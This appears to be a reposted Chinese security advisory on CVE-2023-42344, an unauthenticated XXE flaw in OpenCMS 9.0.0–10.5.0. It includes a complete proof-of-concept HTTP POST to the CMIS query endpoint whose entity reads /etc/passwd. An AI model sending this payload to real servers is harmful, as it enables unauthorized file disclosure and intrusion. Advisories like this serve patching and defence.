CVE-2023-42344|OpenCMS XXE漏洞

admin 2023年12月12日23:27:29评论118 views字数 1189阅读3分57秒阅读模式

0x00 前言

OpenCms 是一个专业级别的开源网站内容管理系统。OpenCms 可以非常容易的帮助建立和管理复杂的网站而无需专业的 HTML 知识。

OpenCms基于JAVA和XML语言技术,因此它适合完全融入到现有的系统内部。OpenCms可以非常好的运行在一个完全的开源环境中(例如:Linux、Apache、Tomcat、MySQL)。

0x01 漏洞描述

由于服务端接收和解析了来自用户端的 XML 数据,且未对引用的外部实体进行适当处理,导致容易受到XML外部实体注入(XXE)攻击。

未经身份验证的远程威胁者可向服务端发送带有XXE Payload的恶意 HTTP POST 请求,成功利用可能导致任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。

0x02 CVE编号

CVE-2023-42344

0x03 影响版本

OpenCMS 9.0.0 - 10.5.0

0x04 漏洞详情

POST /opencms/cmisatom/cmis-online/query HTTP/1.1Content-Type: application/cmisquery+xmlHost: hostContent-Length: 524Connection: close

<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>

CVE-2023-42344|OpenCMS XXE漏洞

0x05 参考链接

https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344

原文始发于微信公众号(信安百科):CVE-2023-42344|OpenCMS XXE漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月12日23:27:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-42344|OpenCMS XXE漏洞http://cn-sec.com/archives/2292372.html

发表评论

匿名网友 填写信息